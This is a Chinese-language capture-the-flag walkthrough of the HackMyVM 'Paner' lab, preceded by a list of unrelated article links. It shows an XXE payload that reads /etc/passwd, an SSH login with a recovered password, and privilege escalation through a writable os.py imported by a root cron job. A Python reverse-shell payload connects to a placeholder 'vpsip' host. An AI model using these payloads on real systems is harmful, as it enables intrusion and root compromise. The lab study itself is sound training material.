- 1如何模拟微信小程序请求code_微信小程序code伪造
- 2前端面试题——实际遇到_dav面试题
- 3Android之android.os.DeadObjectException原因_system.err: android.os.deadobjectexception
- 4html5有向图连接,jquery使用echarts实现有向图可视化功能示例
- 5Chat GPT [Free]_freechatgpt
- 6随机森林如何评估特征重要性_随机森林 特征重要性
- 7HTTP性能压测工具wrk应用实战
- 8【实战】使用Bert微调完成文本二分类_bert+adapter二分类
- 9OCR表格识别(三)——文本检测与文本识别理论学习_ocr 检测和识别的区别
- 10LeetCode 刷题系列 -- 143. 重排链表_重新排序为:l0→ln→l1→ln-1→l2→ln-2→…
靶场渗透之hackmyvm Paner_ptehub
赞
踩
靶场来源:公众号:PTEHub,关注公众号:PTEHub 获取最新靶场资源
靶场类型:单局域网
收集信息
我们先用nmap扫描一下端口
发现22端口和80端口开放
nmap -sS -p 1-65535 -v 10.35.153.34
访问web端口,发现是一个提交表单的页面,无论我们输入什么,都显示已经注册。
我们用burp来抓个包,发现使用xml来传输数据。
可能存在xxe漏洞,我们修改一下请求包,尝试读取文件,发现有root和david用户可以登录
-
- <?xml version = "1.0"?>
- <!DOCTYPE ANY [
- <!ENTITY f SYSTEM "file:///etc/passwd">
- ]>
- <x>&f;</x>
-
-
接下来我们只需要找到密码就可以尝试进行ssh连接 。
尝试读取/home/david 下面的文件,没有显示任何东西。我们去爆破一下/david下面的目录
我们枚举一个变量,选择字典对它进行扫描
通过爆破发现五个目录,筛选之后在/.viminfo文件里面发现密码文件可疑路径
我们读取这个文件,发现疑似密码
我们通过ssh连接尝试一下,输入刚才读到的密码,登录david账号,连接成功。
提升权限
这是一个普通用户,我们要进行提权。
先查看一下系统所有文件中拥有suid权限的文件,查看有没有可能存在的漏洞,没有什么收获
find / -perm -4000 2>/dev/null
我们去github下载一个pspy64
pspy是一个命令行工具,它可以在没有Root权限的情况下,监控Linux进程。黑客可以利用它来查看其他用户的计划任务工作(cron job)
下载之后在下载位置打开终端,使用python3 http服务搭一个简易web服务器实现pspy的文件共享
python3 -m http.server 6767
然后使用wget把pspy下载到david用户
wget http://10.17.22.57:6767/pspy46
然后我们执行pspy64文件,发现没有权限,我们直接赋予它执行权限
chmod +x pspy46
执行之后,监视靶机后台进程
我们发现在后台每分钟会执行一个定时任务,文件路径为/opt/suid.py
执行任务的用户为root用户,我们可以写入反弹shell脚本来获取root权限
查看suid.py文件后发现,该文件为root用户所属,在运行时调用了os.py文件
whereis python3
查找运行python3的所有文件,在/usr/lib/python3.9目录下找到了os.py文件
而os.py文件有写入权限
在os.py中用python写入反弹shell脚本
- import os,socket,subprocess;
- s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
- s.connect(('vpsip',vpsport));os.dup2(s.fileno(),0);
- os.dup2(s.fileno(),1);
- os.dup2(s.fileno(),2);
- p=subprocess.call(['/bin/bash','-i']);
监听端口,提升到root权限,成功拿到flag!
